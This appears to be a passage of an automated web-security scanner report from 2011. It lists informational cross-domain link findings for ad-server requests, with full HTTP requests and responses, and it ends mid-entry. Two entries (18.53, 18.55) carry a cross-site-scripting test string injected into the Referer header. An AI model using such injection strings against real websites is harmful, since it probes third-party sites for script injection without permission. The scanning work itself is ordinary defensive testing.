18.52. http://ad.doubleclick.net/adj/mavericks.dart/homepage_bottom_right_200x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/mavericks.dart/homepage_bottom_right_200x90

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/mavericks.dart/homepage_bottom_right_200x90;sz=200x90;ord=[timestamp]?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/541109/Dallas_Mavericks_200x90.jpg

Request

GET /adj/mavericks.dart/homepage_bottom_right_200x90;sz=200x90;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nba.com/mavericks/index_main.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 307
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:20:17 GMT
Expires: Mon, 13 Jun 2011 11:25:17 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/b;230800006;0-0;0;47541784;969-200/90;40497719/40515506/1;;~sscs=%3fhttp://www.budweiser.com"><img src="http://s0.2mdn.net/viewad/541109/Dallas_Mavericks_200x90.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

18.53. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/blog/hcb/favicon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/mtv.mtvi/atf_j_s/blog/hcb/favicon

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/blog/hcb/favicon;sec0=blog;sec1=hcb;sec2=favicon;!category=expand;!category=blog;pos=atf;tag=adj;mtype=standard;sz=6x6;tile=2;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;demo=775;demo=774;dcopt=ist;u=!category-expand%7C!category-blog%7Cpos-atf%7Ctag-adj%7Cmtype-standard%7Csz-6x6%7Ctile-2%7Cdemo-D%7Cdemo-T%7Cdemo-5840%7Cdemo-2966%7Cdemo-2907%7Cdemo-2905%7Cdemo-2904%7Cdemo-1607%7Cdemo-1299%7Cdemo-850%7Cdemo-848%7Cdemo-844%7Cdemo-827%7Cdemo-790%7Cdemo-777%7Cdemo-775%7Cdemo-774%7Cdcopt-ist;ord=576774106896482400?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/817-grey.gif

Request

GET /adj/mtv.mtvi/atf_j_s/blog/hcb/favicon;sec0=blog;sec1=hcb;sec2=favicon;!category=expand;!category=blog;pos=atf;tag=adj;mtype=standard;sz=6x6;tile=2;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;demo=775;demo=774;dcopt=ist;u=!category-expand%7C!category-blog%7Cpos-atf%7Ctag-adj%7Cmtype-standard%7Csz-6x6%7Ctile-2%7Cdemo-D%7Cdemo-T%7Cdemo-5840%7Cdemo-2966%7Cdemo-2907%7Cdemo-2905%7Cdemo-2904%7Cdemo-1607%7Cdemo-1299%7Cdemo-850%7Cdemo-848%7Cdemo-844%7Cdemo-827%7Cdemo-790%7Cdemo-777%7Cdemo-775%7Cdemo-774%7Cdcopt-ist;ord=576774106896482400? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://hollywoodcrush.mtv.com/favicon.ico4bc7e%3C/script%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3E4e5acb99ae0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

18.54. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/mtv.mtvi/atf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler;sec0=blog;sec1=mvb;sec2=_2011;sec3=_06;sec4=_12;sec5=game_of_thrones_spoiler_death_sean_bean;bcat=poll;bcat=reviews;bcat=tv;btag=game-of-thrones;!category=expand;!category=blog;!category=poll;!category=reviews;!category=tv;!category=game-of-thrones;pos=atf;mtype=standard;sz=6x6;tile=2;dcopt=ist;u=bcat-poll%7Cbcat-reviews%7Cbcat-tv%7Cbtag-game-of-thrones%7C!category-expand%7C!category-blog%7C!category-poll%7C!category-reviews%7C!category-tv%7C!category-game-of-thrones%7Cpos-atf%7Cmtype-standard%7Csz-6x6%7Ctile-2%7Cdcopt-ist;ord=435490855295211100?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/817-grey.gif

Request

GET /adj/mtv.mtvi/atf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler;sec0=blog;sec1=mvb;sec2=_2011;sec3=_06;sec4=_12;sec5=game_of_thrones_spoiler_death_sean_bean;bcat=poll;bcat=reviews;bcat=tv;btag=game-of-thrones;!category=expand;!category=blog;!category=poll;!category=reviews;!category=tv;!category=game-of-thrones;pos=atf;mtype=standard;sz=6x6;tile=2;dcopt=ist;u=bcat-poll%7Cbcat-reviews%7Cbcat-tv%7Cbtag-game-of-thrones%7C!category-expand%7C!category-blog%7C!category-poll%7C!category-reviews%7C!category-tv%7C!category-game-of-thrones%7Cpos-atf%7Cmtype-standard%7Csz-6x6%7Ctile-2%7Cdcopt-ist;ord=435490855295211100? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 461
Date: Mon, 13 Jun 2011 11:18:20 GMT
Expires: Mon, 13 Jun 2011 11:23:20 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/p;44306;0-0;0;65346782;490-6/6;0/0/0;u=bcat-poll|bcat-reviews|bcat-tv|btag-game-of-thrones|!category-expand|!category-blog|!category-poll|!category-reviews|!category-tv|!category-game-of-thrones|pos-atf|mtype-standard|sz-6x6|tile-2|dcopt-ist;~aopt=2/1/c4a3/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

18.55. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/blog/hcb/favicon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/mtv.mtvi/btf_j_s/blog/hcb/favicon

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/blog/hcb/favicon;sec0=blog;sec1=hcb;sec2=favicon;!category=expand;!category=blog;pos=btf;tag=adj;mtype=standard;sz=1x4;tile=5;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;demo=775;demo=774;dcopt=ist;u=!category-expand%7C!category-blog%7Cpos-btf%7Ctag-adj%7Cmtype-standard%7Csz-1x4%7Ctile-5%7Cdemo-D%7Cdemo-T%7Cdemo-5840%7Cdemo-2966%7Cdemo-2907%7Cdemo-2905%7Cdemo-2904%7Cdemo-1607%7Cdemo-1299%7Cdemo-850%7Cdemo-848%7Cdemo-844%7Cdemo-827%7Cdemo-790%7Cdemo-777%7Cdemo-775%7Cdemo-774%7Cdcopt-ist;ord=576774106896482400?

The response contains the following link to another domain:

http://shop.mtv.com/

Request

GET /adj/mtv.mtvi/btf_j_s/blog/hcb/favicon;sec0=blog;sec1=hcb;sec2=favicon;!category=expand;!category=blog;pos=btf;tag=adj;mtype=standard;sz=1x4;tile=5;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;demo=775;demo=774;dcopt=ist;u=!category-expand%7C!category-blog%7Cpos-btf%7Ctag-adj%7Cmtype-standard%7Csz-1x4%7Ctile-5%7Cdemo-D%7Cdemo-T%7Cdemo-5840%7Cdemo-2966%7Cdemo-2907%7Cdemo-2905%7Cdemo-2904%7Cdemo-1607%7Cdemo-1299%7Cdemo-850%7Cdemo-848%7Cdemo-844%7Cdemo-827%7Cdemo-790%7Cdemo-777%7Cdemo-775%7Cdemo-774%7Cdcopt-ist;ord=576774106896482400? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://hollywoodcrush.mtv.com/favicon.ico4bc7e%3C/script%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3E4e5acb99ae0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 176
Date: Mon, 13 Jun 2011 11:34:29 GMT
Expires: Mon, 13 Jun 2011 11:39:29 GMT

document.write('');

document.write('<a target="_blank" href="http://shop.mtv.com/">Find cool stuff for all your favorite shows at the MTV Shop</a>');

document.write('');

18.56. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/mtv.mtvi/btf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler;sec0=blog;sec1=mvb;sec2=_2011;sec3=_06;sec4=_12;sec5=game_of_thrones_spoiler_death_sean_bean;bcat=poll;bcat=reviews;bcat=tv;btag=game-of-thrones;!category=expand;!category=blog;!category=poll;!category=reviews;!category=tv;!category=game-of-thrones;pos=btf;mtype=standard;sz=1x4;tile=5;dcopt=ist;u=bcat-poll%7Cbcat-reviews%7Cbcat-tv%7Cbtag-game-of-thrones%7C!category-expand%7C!category-blog%7C!category-poll%7C!category-reviews%7C!category-tv%7C!category-game-of-thrones%7Cpos-btf%7Cmtype-standard%7Csz-1x4%7Ctile-5%7Cdcopt-ist;ord=329849423211999200?

The response contains the following link to another domain:

http://shop.mtv.com/

Request

GET /adj/mtv.mtvi/btf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler;sec0=blog;sec1=mvb;sec2=_2011;sec3=_06;sec4=_12;sec5=game_of_thrones_spoiler_death_sean_bean;bcat=poll;bcat=reviews;bcat=tv;btag=game-of-thrones;!category=expand;!category=blog;!category=poll;!category=reviews;!category=tv;!category=game-of-thrones;pos=btf;mtype=standard;sz=1x4;tile=5;dcopt=ist;u=bcat-poll%7Cbcat-reviews%7Cbcat-tv%7Cbtag-game-of-thrones%7C!category-expand%7C!category-blog%7C!category-poll%7C!category-reviews%7C!category-tv%7C!category-game-of-thrones%7Cpos-btf%7Cmtype-standard%7Csz-1x4%7Ctile-5%7Cdcopt-ist;ord=329849423211999200? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 176
Date: Mon, 13 Jun 2011 11:18:28 GMT
Expires: Mon, 13 Jun 2011 11:23:28 GMT

document.write('');

document.write('<a target="_blank" href="http://shop.mtv.com/">Find cool stuff for all your favorite shows at the MTV Shop</a>');

document.write('');

18.57. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/mtv.mtvi/btf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler;sec0=blog;sec1=mvb;sec2=_2011;sec3=_06;sec4=_12;sec5=game_of_thrones_spoiler_death_sean_bean;bcat=poll;bcat=reviews;bcat=tv;btag=game-of-thrones;!category=expand;!category=blog;!category=poll;!category=reviews;!category=tv;!category=game-of-thrones;pos=btf;mtype=standard;sz=160x600;tile=4;u=bcat-poll%7Cbcat-reviews%7Cbcat-tv%7Cbtag-game-of-thrones%7C!category-expand%7C!category-blog%7C!category-poll%7C!category-reviews%7C!category-tv%7C!category-game-of-thrones%7Cpos-btf%7Cmtype-standard%7Csz-160x600%7Ctile-4;ord=435490855295211100?

The response contains the following link to another domain:

http://view.atdmt.com/AST/view/324311157/direct/01/6947169

Request

GET /adj/mtv.mtvi/btf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler;sec0=blog;sec1=mvb;sec2=_2011;sec3=_06;sec4=_12;sec5=game_of_thrones_spoiler_death_sean_bean;bcat=poll;bcat=reviews;bcat=tv;btag=game-of-thrones;!category=expand;!category=blog;!category=poll;!category=reviews;!category=tv;!category=game-of-thrones;pos=btf;mtype=standard;sz=160x600;tile=4;u=bcat-poll%7Cbcat-reviews%7Cbcat-tv%7Cbtag-game-of-thrones%7C!category-expand%7C!category-blog%7C!category-poll%7C!category-reviews%7C!category-tv%7C!category-game-of-thrones%7Cpos-btf%7Cmtype-standard%7Csz-160x600%7Ctile-4;ord=435490855295211100? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1840
Date: Mon, 13 Jun 2011 11:18:32 GMT
Expires: Mon, 13 Jun 2011 11:23:32 GMT

document.write('<iframe src=\"http://view.atdmt.com/AST/iview/324311157/direct;vt.1/01/6947169?buster_url=&pub_view_url=&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b25/3/0/%2a/d%3B242348695%3B0-0
...[SNIP]...
views|%21category-tv|%21category-game-of-thrones|pos-btf|mtype-standard|sz-160x600|tile-4%3B%7Eaopt%3D2/1/c4a3/0%3B%7Esscs%3D%3fhttp://clk.atdmt.com/AST/go/324311157/direct/01/6947169" target="_blank"><img src="http://view.atdmt.com/AST/view/324311157/direct/01/6947169"/></a>
...[SNIP]...

18.58. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/mtv.mtvi/btf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler;sec0=blog;sec1=mvb;sec2=_2011;sec3=_06;sec4=_12;sec5=game_of_thrones_spoiler_death_sean_bean;bcat=poll;bcat=reviews;bcat=tv;btag=game-of-thrones;!category=expand;!category=blog;!category=poll;!category=reviews;!category=tv;!category=game-of-thrones;pos=btf;mtype=standard;sz=160x600;tile=4;u=bcat-poll%7Cbcat-reviews%7Cbcat-tv%7Cbtag-game-of-thrones%7C!category-expand%7C!category-blog%7C!category-poll%7C!category-reviews%7C!category-tv%7C!category-game-of-thrones%7Cpos-btf%7Cmtype-standard%7Csz-160x600%7Ctile-4;ord=329849423211999200?

The response contains the following link to another domain:

http://view.atdmt.com/AST/view/324311157/direct/01/6939466

Request

GET /adj/mtv.mtvi/btf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler;sec0=blog;sec1=mvb;sec2=_2011;sec3=_06;sec4=_12;sec5=game_of_thrones_spoiler_death_sean_bean;bcat=poll;bcat=reviews;bcat=tv;btag=game-of-thrones;!category=expand;!category=blog;!category=poll;!category=reviews;!category=tv;!category=game-of-thrones;pos=btf;mtype=standard;sz=160x600;tile=4;u=bcat-poll%7Cbcat-reviews%7Cbcat-tv%7Cbtag-game-of-thrones%7C!category-expand%7C!category-blog%7C!category-poll%7C!category-reviews%7C!category-tv%7C!category-game-of-thrones%7Cpos-btf%7Cmtype-standard%7Csz-160x600%7Ctile-4;ord=329849423211999200? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1840
Date: Mon, 13 Jun 2011 11:18:25 GMT
Expires: Mon, 13 Jun 2011 11:23:25 GMT

document.write('<iframe src=\"http://view.atdmt.com/AST/iview/324311157/direct;vt.1/01/6939466?buster_url=&pub_view_url=&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b25/3/0/%2a/d%3B242348695%3B0-0
...[SNIP]...
views|%21category-tv|%21category-game-of-thrones|pos-btf|mtype-standard|sz-160x600|tile-4%3B%7Eaopt%3D2/1/c4a3/0%3B%7Esscs%3D%3fhttp://clk.atdmt.com/AST/go/324311157/direct/01/6939466" target="_blank"><img src="http://view.atdmt.com/AST/view/324311157/direct/01/6939466"/></a>
...[SNIP]...

18.59. http://ad.doubleclick.net/adj/team_sites.dart/global_nav previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/team_sites.dart/global_nav

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/team_sites.dart/global_nav;sz=511x20;ord=1307963450?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2942387/StatsCube_Stripe_511x20.jpg

Request

GET /adj/team_sites.dart/global_nav;sz=511x20;ord=1307963450? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nba.com/mavericks/index_main.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 314
Date: Mon, 13 Jun 2011 11:20:11 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/r;240162719;0-0;0;56610148;39442-511/20;41773152/41790939/1;;~sscs=%3fhttp://www.nba.com/statscube"><img src="http://s0.2mdn.net/viewad/2942387/StatsCube_Stripe_511x20.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

18.60. http://ad.doubleclick.net/adj/ugo.ugo.tv/tv-index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/ugo.ugo.tv/tv-index

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/ugo.ugo.tv/tv-index;dev=false;pt=news;rb=true;channel=tv;genre=drama;genre=science-fiction-fantasy;tag=fantasy;tag=game-of-thrones;tag=hbo;tag=magic;tag=sean-bean;;sz=2x1;pos=top;tile=4;ord=9305931590?

The response contains the following link to another domain:

http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

Request

GET /adj/ugo.ugo.tv/tv-index;dev=false;pt=news;rb=true;channel=tv;genre=drama;genre=science-fiction-fantasy;tag=fantasy;tag=game-of-thrones;tag=hbo;tag=magic;tag=sean-bean;;sz=2x1;pos=top;tile=4;ord=9305931590? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/tv/game-of-thrones-baelor-preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7586
Date: Mon, 13 Jun 2011 11:18:44 GMT

document.write('\n<div style=\"position:absolute; left:0px; top:0px; visibility:hidden\"></div> \n\n<div id=\"bottombar\">\n\n\n<st
...[SNIP]...
vars += "&googleTrackName="+myObj.googleTrackName;
           myObj.flvars += "&preff24="+myObj.preff24;
           myObj.flvars += "&viewTrack="+myObj.viewTrack;
           myObj.flvars += "&lc="+lc;


           myObj.str = '<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" id="'+swfId+'" width="100%" height="100%" />';
           myObj.str += '<param name="movie" value="' + swfSrc + '" />
...[SNIP]...

18.61. http://ad.doubleclick.net/adj/ugo.ugo.tv/tv-index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/ugo.ugo.tv/tv-index

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/ugo.ugo.tv/tv-index;dev=false;pt=news;rb=true;channel=tv;genre=drama;genre=science-fiction-fantasy;tag=fantasy;tag=game-of-thrones;tag=hbo;tag=magic;tag=sean-bean;;sz=300x250;pos=top;tile=3;ord=9305931590?

The response contains the following link to another domain:

http://view.atdmt.com/M0N/view/313673310/direct;wi.300;hi.250/01/6942497

Request

GET /adj/ugo.ugo.tv/tv-index;dev=false;pt=news;rb=true;channel=tv;genre=drama;genre=science-fiction-fantasy;tag=fantasy;tag=game-of-thrones;tag=hbo;tag=magic;tag=sean-bean;;sz=300x250;pos=top;tile=3;ord=9305931590? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/tv/game-of-thrones-baelor-preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1174
Date: Mon, 13 Jun 2011 11:18:28 GMT

document.write('<iframe src=\"http://view.atdmt.com/M0N/iview/313673310/direct;wi.300;hi.250/01/6942497?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b25/3/0/%2a/b%3B240057164%3B0-0%3B0%3B44994092%3
...[SNIP]...
k%3Bh%3Dv8/3b25/3/0/%2a/b%3B240057164%3B0-0%3B0%3B44994092%3B4307-300/250%3B41855128/41872915/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/M0N/go/313673310/direct;wi.300;hi.250/01/6942497" target="_blank"><img src="http://view.atdmt.com/M0N/view/313673310/direct;wi.300;hi.250/01/6942497"/></a>
...[SNIP]...

18.62. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The page was loaded from a URL containing a query string:

http://ad.turn.com/server/ads.js?pub=5757398&cch=5766863&code=5766871&l=728x90&aid=26076973&ahcid=1248825&bimpd=tnh5kOIQk2255pLWanK2LZcOZ0Xe7XRsNtaCSNRj4eWbIaTt5sEN22cf7T9inXGCfevepAsIOj8SO6gD6WEWNkBwM6lThrHlUbylbPzsNzPAPrC9HuVVdOdoSVIf4Q7vKdiNp00MG-4g-SW2wXsWr8hPXeTg3iWuK9dzXzQhDWXuf_W85AIbu_k4MXFVPhvxl49Gd7eGbohUola1IsAqNHH4_eRRABd-o2OeqNW9Zq3hEvRTxe2MfmNbZ8SKKyJZjq9EazwvV7Hgj0fjo5qk4uoWDBDa085haSo4Ny4dtVJvorUFStWcmqm4mTok4izxBR6k7MPjiYBn-7wSi5rTeEad-z_DTQa9xbq74o7BB2XjCdCq-rr8Gs1UOPSaG-9QZ4hcG6ggrefD0sHcxXQl_d2s0r6IWtKQA0bj6O4krNIboWExY7KVnwMSJJjA1mZn01FWo7q4vy41vm34Pwc39gHL8ldgaJXLC7KSPErv5i6EH7pQDizJVheCqGlHyIJ07oZEmsV4wSAw3PEMhjBD_FiVGn_YtAvnYgb7ZUL3ZEoEIfzyuC8lfs_POr6ay0Jn108ZeReclWINle-JSAAivAs7DOhel4FONo1xaTGK_aPq-VtXEhMZXDtuJRuxtDZ-SGFk_WZ6yZGEkt5qJKz6W6KuT2zukDvKDEXMusigDnO0plXh3bgNH5J4x6oZdN_2LFuzw_a8Is3Hy9klMovqk4U4nuS2y2UnpCnJQaY9S4DkQ0k12v9aZSgHYEYtLfmA_fHyrZgnOjqPZTz8mEnm3dsOwc5I7-3REYjKbqgdudCmml7qFPFP7mN0WUKc-4figX1kYndVR773TaDO4Pbi8sspNzvlLkqIgSvILLcYfmfRlbjI2Q6PAnDkDwTkX2GTvkrlJSiqAcAga8WZiP6MNA&acp=1.4703&3c=http://track1000.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=LmsAAC9rAAD/VwAA6AEAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAAAAAAAAIAAABBRkZCRTI1MC05QTEyLTQ1MzItQURFOC0yNjdBNDAwRjMxQkEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=

The response contains the following link to another domain:

